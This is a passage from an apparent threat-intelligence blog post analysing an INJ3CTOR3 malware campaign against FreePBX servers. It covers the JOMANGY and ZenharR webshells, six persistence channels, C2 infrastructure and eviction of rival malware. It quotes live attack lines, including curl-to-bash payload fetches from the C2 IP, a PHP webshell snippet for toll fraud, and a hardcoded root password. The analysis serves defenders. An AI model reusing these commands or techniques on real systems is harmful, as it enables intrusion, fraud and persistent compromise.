<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Lines 9-10 redundantly repeat the useradd invocations for newfpbx and xhimax. Lines 29-30 apply chattr +i to the primary webshell files. Lines 31-32 execute a base64-decoded tryRoot1.sh shell script (run twice redundantly), which writes <em>/var/www/html/admin/modules/freepbx_ha/license.php</em> and triggers the FreePBX HA hooks.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The operator rotates k.php actively. The artifact collected (100259af, ~45KB) and the VT URL last-fetch variant (49abb105, retrieved 2026-04-29) are distinct, which suggests that what a victim receives from k.php at any given moment may differ from what was analyzed here. (See Figure 11)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118832,"width":"1024px","height":"auto","sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large is-resized"><img src="https://cyble.com/wp-content/uploads/2026/05/11-1024x590.png" alt="Figure 11 – k.php" class="wp-image-118832"><figcaption class="wp-element-caption"><em>Figure 11 – k.php</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The PHP webshell blob is double-obfuscated: an outer base64 layer encodes a PHP string that, when decoded, applies str_rot13() to a second encoded layer before passing the result to eval(). Once decoded, the webshell presents a form with &lt;input type="submit" name="JOMANGY" value="JOMANGY"&gt;, the identifier establishing this as the <strong>JOMANGY </strong>family.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The outer PHP wrapper includes dead-code AV evasion and a watermark comment,/* trace_e1ebf9066a951be519a24140711839ea */, which appears in each deployed instance, tying deployments in this campaign to a single common source. (See Figure 12)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118834,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/12-1024x891.png" alt="Figure 12 – Embedded JOMANGY webshell" class="wp-image-118834"><figcaption class="wp-element-caption"><em>Figure 12 – Embedded JOMANGY webshell</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Stage 3: wr.php (d40180f7, 27KB, Bash)</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>wr.php mirrors the k.php structure but targets a different primary webshell path set and deploys the ZenharR family. It opens with the same concurrent dropper execution (curl <a href="http://45.95.147.178/x">http://45[.]95[.]147[.]178/x</a> -ks | bash), then writes a ZenharR webshell blob to two paths simultaneously via tee: <em>/var/www/html/digium_phones/ajax.php</em> and <em>/var/www/html/admin/views/some.php</em>.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The subsequent 15 cp commands (lines 4 and 16–29) copy from <em>/var/www/html/admin/views/ajax.php</em>, which at this point contains the JOMANGY webshell placed by k.php, to 15 additional some.php paths across the FreePBX web tree.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>These copies, therefore, propagate JOMANGY, not ZenharR. wr.php applies .htaccess and chattr +i to its primary write targets, runs the MySQL backdoor reinstallation with the same freepbxusers SHA1 hash, and calls back to <a href="http://45.95.147.178/z/post/noroot.php"><em>http://45[.]95[.]147[.]178/z/post/noroot.php</em></a><em> | sh</em> after completing ZenharR deployment and file propagation, then once again after executing tryRoot1.sh.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The tryRoot1.sh execution writes <em>/var/www/html/admin/modules/freepbx_ha/license.php</em> and triggers the FreePBX HA hooks by writing a trigger token to <em>/usr/local/asterisk/ha_trigger</em> and <em>/usr/local/asterisk/ha_triggers</em>.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The wr.php cron entries land on a victim through two independent paths: license.php's dual-track reinstallation logic, and a set of explicit wget .../z/wr.php ... | crontab - commands baked directly into the tryRoot1.sh payload embedded in wr.php itself.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The license.php path is the shared channel, and the direct crontab install is a wr.php-specific fallback. A defender who neutralizes the license.php-mediated cron track but leaves wr.php's own tryRoot1.sh reachable still gets wr.php re-established on its own. (See Figure 13)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118836,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/13-1024x496.png" alt="Figure 13 – wr.php" class="wp-image-118836"><figcaption class="wp-element-caption"><em>Figure 13 – wr.php</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Stage 3 (parallel): wor.php (995e6304, 13KB, Bash)</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>wor.php is a lighter-weight dropper hosted at /z/wor.php on the C2 but with no trigger identified in any executed payload in the recovered artifact chain (see Campaign Architecture above). Unlike wr.php, it does not chain the concurrent dropper (x).</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>It writes a ZenharR webshell blob via tee to both /var/www/html/digium_phones/ajax.php and /var/www/html/admin/views/ajax.php simultaneously — the latter overwriting the JOMANGY webshell that k.php placed there, replacing it with ZenharR.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The 10 subsequent cp commands copy the contents of admin/views/ajax.php, which now holds ZenharR, to 10 additional paths. wor.php applies an .htaccess rewrite rule but has no chattr +i commands.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>It calls back to <em>hxxp://45[.]95[.]147[.]178/z/post/noroot.php| sh </em>after completing ZenharR deployment and file propagation, then once again after executing the tryRoot1.sh sequence.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The deployed ZenharR instance uses a distinct auth hash (b92c65af386ed772972b43cab0d55a4a) and embeds operator VPN IP 169[.]150[.]218[.]33.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>At the time of analysis, the noroot.php endpoint served an empty response, indicating a non-root execution callback path that is prepared but not yet populated with commands.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>freepbx_ha/license.php (PHP executor)</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>license.php is a PHP script written to disk by tryRoot1.sh and invoked via the FreePBX HA mechanism. It contains system(‘%s’), a format-string placeholder that the operator populates through the JOMANGY webshell before triggering the HA hook, providing privileged arbitrary command execution. Unlike the JOMANGY and ZenharR browser-accessible webshells, license.php lacks an authentication mechanism and eval-based obfuscation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Beyond that command slot, the script runs three independent user-deletion loops clearing all non-root UID-0 and UID-≥1000 accounts; chpasswd operations setting ueteGJYCHeMTk on root and seven service accounts (sugarmaint, spamfilter, asteriskuser, supports, asterisk, freepbxuser, and supermaint); useradd commands promoting sugarmaint, supports, and supermaint to UID-0; SSH hardening; httpd log scrubbing; a dual-track cron reinstallation covering both k.php and z/wr.php download paths; and a final curl http://45[.]95[.]147[.]178/z/post/root.php | sh. At the time of analysis, root.php served a 12-byte #!/bin/bash stub with no active commands.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The script also explicitly enables PermitRootLogin, opens TCP/22 through iptables, and restarts sshd to ensure remote administrative access remains available. (See Figure 14)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118838,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/14-1024x563.png" alt="Figure 14 – license.php" class="wp-image-118838"><figcaption class="wp-element-caption"><em>Figure 14 – license.php</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Obfuscation and Evasion Techniques</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Stage 1's encoding choices are purposeful. Most of the script runs in plaintext, including competitor eviction, iptables rules, and log deletion. The base64 encoding is reserved specifically for the UID-0 useradd invocations (lines 262-264) and the shell profile stager (line 302).</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The -ou 0 flag combination is one of the more reliable behavioral heuristics in endpoint tooling, and encoding those three lines costs the operator nothing while suppressing the most detectable pattern in the dropper.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The cron payload variables (B64_ZEN2, B64_DEVNULL, B64_HEAL) are stored as base64 strings decoded inline at runtime. A crontab -l on a victim host returns what appears to be benign variable assignments.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The download URLs and execution commands are not visible without manually decoding each variable. (See Figure 15)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118840,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/15-1024x88.png" alt="Figure 15 – base64 encoded useradd invocations" class="wp-image-118840"><figcaption class="wp-element-caption"><em>Figure 15 – base64 encoded useradd invocations</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>JOMANGY's encoding is a step up from what this operator has used before. The outer PHP blob runs str_rot13() on an inner base64 payload before passing to eval(). In practice, automated analysis tools that stop after a single base64 decode pass produce ROT13 output, not PHP, and yield nothing actionable.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The dead-code stub (if(false){ $SdDDlKoPiuhDB = 'deadcode_anti_av'; }) is a separate trick that targets static heuristics that flag PHP files for suspicious variable assignments. The variable exists only inside a branch that never executes. Neither of the techniques used is novel, but both offer cheap modifications with measurable payoff. (See Figure 16)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118841,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/05/16.png" alt="Figure 16 – JOMANGY base64 decoded rot13 output" class="wp-image-118841"><figcaption class="wp-element-caption"><em>Figure 16 – JOMANGY base64 decoded rot13 output</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>k.php, and wr.php had zero VirusTotal submissions at the time of analysis, and Stage 1 came in at four detections across 76 engines. (See Figure 17)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118843,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/17-1024x496.png" alt="Figure 17 – STAGE 1 dropper detections" class="wp-image-118843"><figcaption class="wp-element-caption"><em>Figure 17 – STAGE 1 dropper detections</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Persistence Mechanisms</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The campaign establishes six independent persistence channels, engineered so that partial remediation leaves the infection intact and capable of full re-establishment.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Channel 1: Primary cron polling:</strong> We observed 8 cron entries installed across 2 blocks download <em>hxxp://45[.]95[.]147[.]178/k.php</em> every one to three minutes and execute the result under varying binary paths in /var/lib/asterisk/bin/, /dev/shm/.systemd/, and /tmp/.cache/.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This is the primary beacon: every minute, the crontab runs, fetching the latest version of k.php and re-executing it, redeploying any removed webshells within 3 minutes. (See Figure 18)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118844,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/18-1024x123.png" alt="Figure 18 – Primary Cron Polling" class="wp-image-118844"><figcaption class="wp-element-caption"><em>Figure 18 – Primary Cron Polling</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Channel 2: Shell profile persistence.</strong> Stage 1 appends a base64-encoded download-and-execute stager to /root/.bash_profile, /root/.bashrc, and /etc/rc.local. This channel fires on every interactive root login and every system reboot, independently of the cron subsystem. An operator who kills all running dropper processes and clears the crontab will re-trigger the infection on the next login or reboot. (See Figure 19)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118846,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/19-1024x92.png" alt="Figure 19 – Shell Profile Persistence" class="wp-image-118846"><figcaption class="wp-element-caption"><em>Figure 19 – Shell Profile Persistence</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Channel 3: Self-healing crontab backup system.</strong> Stage 1 writes the active crontab to eight hidden paths using directory names that mimic legitimate system directories. Each file is immediately flagged immutable with <em>chattr +i</em>, so that <em>rm -rf</em> executed even by root silently fails without error. Two separate cron restore entries, then protect these backups.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The first (B64_HEAL, line 357) fires at a random minute every hour and decodes to: <em>for b in &lt;all 8 paths&gt;; do [ -s "$b" ] &amp;&amp; crontab "$b" &amp;&amp; break; done</em>.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The second (line 359) fires every minute with an inline condensed version, iterating five of the eight paths.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A defender who removes only the B64_HEAL entry leaves the per-minute restore entry active.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A defender who removes both restore entries but misses the immutable flag on even one backup file finds the crontab reinstalled within an hour when the next dropper execution re-installs the restore entries.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Leaving any single channel intact causes full infection to re-establish within minutes. (See Figure 20)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118847,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/20-1024x258.png" alt="Figure 20 – Self-healing crontab backup system" class="wp-image-118847"><figcaption class="wp-element-caption"><em>Figure 20 – Self-healing crontab backup system</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Channel 4: Process watchdog.</strong> Stage 1 installs a cron entry running <em>pgrep -x zen2 || bash &lt;download_path&gt; and pgrep -x devnull2 || bash &lt;download_path&gt;</em>. If either the primary beacon binary (zen2) or the secondary variant (devnull2) is absent from the process table, the watchdog re-downloads and re-executes k.php. Killing the beacon process without simultaneously removing the watchdog cron entry results in an immediate respawn.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Channel 5: PHP webshells with immutability.</strong> Stage 2 writes JOMANGY to over twelve paths while Stage 3 adds more. wr.php drops ZenharR directly into digium_phones/ajax.php and admin/views/some.php, then bulk-copies the existing JOMANGY shell to 15 additional paths via a cp loop. Primary copies carry <em>chattr +i</em>, so <em>rm -rf</em> issued as root returns without removing the file.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Each deployed instance is also a dropper in its own right, where a single authenticated HTTP request to any surviving shell triggers a full cron reinstall, credential rotation, and re-execution of all stages. If a defender misses one path during cleanup, the operator rebuilds the entire infection stack from a browser.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Channel 6: freepbx_ha/license.php.</strong> The PHP executor, triggered via the FreePBX HA hook mechanism, includes its own independent cron reinstallation logic for both k.php and wr.php download tracks. As long as this file exists on disk and the FreePBX HA module is installed, the operator can invoke it to rebuild the entire persistence stack from scratch. (See Figure 21)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118848,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/21-1024x122.png" alt="Figure 21 – license.php dual-track cron reinstall (wr.php &amp; k.php)" class="wp-image-118848"><figcaption class="wp-element-caption"><em>Figure 21 – license.php dual-track cron reinstall (wr.php &amp; k.php)</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Implant and Backdoor Analysis</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>JOMANGY has no prior public documentation. This analysis is its first description. Every deployed instance carries the watermark /* trace_e1ebf9066a951be519a24140711839ea */, which makes hunting straightforward: any PHP file under the FreePBX web root containing that string is a campaign artifact. An earlier variant (SHA256 039d648b, VT first seen 2026-04-07) had a different auth hash (bfcedbc1831779921a0ee2cfaee004f2) and embedded operator IP 146[.]70[.]129[.]114 (AS9009 M247 Europe SRL). The operator rotated both webshell credentials and VPN provider between that early variant and the live campaign deployment, moving from M247 to Datapacket-hosted infrastructure somewhere in between. Below is the JOMANGY operator panel. (See Figure 22)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118849,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/22-1024x238.png" alt="Figure 22 – Operator Panel" class="wp-image-118849"><figcaption class="wp-element-caption"><em>Figure 22 – Operator Panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>ZenharR</strong> was documented by Unit 42 in 2022 against the same actor lineage. This is tool reuse rather than a new family. The wr.php and wor.php instances have distinct auth hashes and embedded IPs per deployment (a2f6863.../169[.]150[.]218[.]37 and b92c65af.../169[.]150[.]218[.]33).</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>SANS ISC diary #32892 observed a third hash (cf710203400b8c466e6dfcafcf36a411) at /admin/modules/phones/ajax.php, a third deployed variant that was not in the collected artifact set. All instances use single-layer base64 + eval obfuscation and authenticate via md5($_REQUEST['md5']) == '&lt;hash&gt;'; the C2's ___ask.php and ___md5.php both serve the same live token (ec4ca4db5ec0b782e51224fa7082ac06), which enables the operator to rotate webshell credentials across all victims simultaneously by updating a single file.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Post-authentication, both webshell families expose the same capabilities. The VoIP fraud module is present in all instances:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>if (isset($_REQUEST['call'])) {<br>    system('asterisk -rx "channel originate Local/'<br>        . $_REQUEST['prs'] . $_REQUEST['num']<br>        . '@' . $_REQUEST['context']<br>        . ' application wait '<br>        . $_REQUEST['time'] . '"');<br>}<br> </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Four parameters from the browser: prs (prefix/country code), num (destination), context (Asterisk dialplan context), and time (call duration). The webshell runs asterisk -rx locally. Victim's trunks, victim's bill.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The same channel-originating interface was documented in the 2022 ZenharR samples (Unit 42) and in the January 2026 VictamPbx webshells.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The remaining capabilities are consistent across all three instances: $_REQUEST['cmd'] -&gt; system() for arbitrary OS commands; Elastix SQLite ACL database theft (/var/www/db/acl.db); and FreePBX admin session hijack via ampuser setAdmin().</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Command and Control</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The C2 at 45[.]95[.]147[.]178 (AS49870 Alsycon B.V., Netherlands) hosts the /z/ directory, the operator's backend, four static text files with no panel, no framework, and no staging server visible from the recovered artifacts. ___ip.php serves a single IP address (169[.]150[.]218[.]33) that matches the operator VPN IP embedded in wor.php's ZenharR authentication form; PTR resolution returns a Datapacket hostname (AS212238), consistent with dedicated operator-controlled infrastructure, though the file's exact role on the C2 is not confirmed from the artifact alone.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p> ___ask.php and ___md5.php both serve the same 32-byte string (ec4ca4db5ec0b782e51224fa7082ac06).</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The most consistent read is that deployed webshells poll one of these endpoints to stay synchronized on the valid auth hash — a single file update on the C2 rotates credentials across every victim simultaneously.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>___zen.php (a8b65af6c142736ccf80420e44df240f) is assessed as a ZenharR payload integrity reference; no mechanism confirming that function was identified in the recovered chain. (See Figure 23)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118851,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/23-1024x405.png" alt="" class="wp-image-118851"><figcaption class="wp-element-caption"><em>Figure 23 – Operator VPN IPs (VirusTotal)</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The scanner 160[.]119[.]76[.]250 sits in the same AS49870 allocation as the primary C2 and was independently named by <a href="https://isc.sans.edu/diary/32892">SANS ISC diary #32892</a> as the probe origin for this campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Competitor Eviction and Ecosystem Dynamics</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Stage 1 evicts two distinct sets of tooling. The first is the operator's own prior-campaign artifacts; the January 2026 encystPHP infrastructure was cleared from every host being migrated to the new Dutch infrastructure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The second is the standard competitor cleanup: roughly 50 webshell families deleted across the web tree and 11 external C2 IPs blocked bidirectionally, keeping the same pool of compromised FreePBX systems clear of actors who have been co-resident on them since at least 2020.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The self-eviction evidence is unambiguous. The prior campaign dropper (71d94479, January 2026, C2 45[.]234[.]176[.]202) deployed a webshell named "VictamPbx" with button markup name="VictamPbx" and embedded the unique marker string bm2cjjnRXac1WW3KT7k6MKTR in its own competitor eviction grep list.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Both strings appear verbatim in the current Stage 1 dropper's eviction routine, causing the current campaign to search for and delete files from the prior campaign's own webshell family.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The prior C2 IP 45[.]234[.]176[.]202 appears on the current campaign's iptables block list, blocking any still-running prior-campaign beacon from reaching its origin server.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The prior campaign's download artifacts (devnull24, devnull23, devnull2) are explicitly deleted while every compromised host is moved from the January 2026 Brazilian infrastructure to the April 2026 Dutch infrastructure (every trace of the prior generation is carried over). (See Figure 24)</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":118853,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/05/24-1024x215.png" alt="Figure 24 – Self-eviction evidence" class="wp-image-118853"><figcaption class="wp-element-caption"><em>Figure 24 – Self-eviction evidence</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The third-party cleanup spans roughly 50 webshell signatures: b374k, t3rr0r, Hacked, New-Pbx, FaTaLisTiCz_Fx, b3d0r, yokyok, watchTowr, nahda, bluej, Black Ban V1.01, and others. b3d0r and yokyok have appeared in INJ3CTOR3 eviction lists since 2020.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The same actors have been sharing these compromised hosts with INJ3CTOR3 for at least 6 years, only to be evicted with each new campaign generation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The watchTowr entry is worth noting separately (the same research group whose CVE-2025-57819 PoC artifacts get evicted from disk) is also the source of the vulnerability most consistent with this campaign's initial access method.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The iptables blocking goes in both directions — INPUT -s &lt;C2&gt; DROP stops competitor servers from delivering payloads or issuing commands; OUTPUT -d &lt;C2&gt; DROP stops the host from calling back, even if a competitor webshell survives the filesystem eviction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The seven competitor IPs replaced in the FreePBX and Asterisk config files are the same C2 hijacking the 2022 generation. Wherever prior malware had pointed FreePBX to a competitor’s IP address, this campaign overwrites it with its own IP address, diverting any residual callbacks.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>JOMANGY is documented as a previously undocumented PHP webshell family, deployed with double-layer obfuscation, that outperforms every prior generation of INJ3CTOR3 tooling. k.php and wr.php arrived at near-zero AV coverage, and the operator is actively rotating k.php to sustain that gap.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>What distinguishes this generation is not the count of persistence channels but the engineering logic connecting them. Each of the six channels can rebuild every other channel. Immutable crontab backups silently block root-level deletion. Every deployed webshell doubles as a complete dropper.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The architecture is designed to prevent sequential remediation from succeeding. Clearing five of six channels hands the infection a recovery window measured in minutes. A confirmed infection warrants a full rebuild from a clean baseline.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The self-eviction of prior campaign artifacts is as analytically significant as the new tooling. Hunting down VictamPbx artifacts, cutting off the old C2, and rotating passwords on dormant accounts all point to an intentional botnet migration rather than an incidental cleanup.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Six years of continuous operation, each generation cleanly evicting the last, reflects the discipline that keeps this campaign running through repeated public disclosure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Both candidate CVEs are patched in current FreePBX releases, but the 700+ hosts Shadowserver tracked as still compromised five months after the CVE-2025-64328 disclosure suggest that patching alone does not equal remediation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>On an already-owned host, patching closes the entry point but leaves the cron infrastructure intact, allowing the infection to re-establish itself before the patch can take effect.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The C2 at 45[.]95[.]147[.]178 remains active. Cyble Research &amp; Intelligence Labs continues to monitor the evolution of INJ3CTOR3's infrastructure and toolset.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
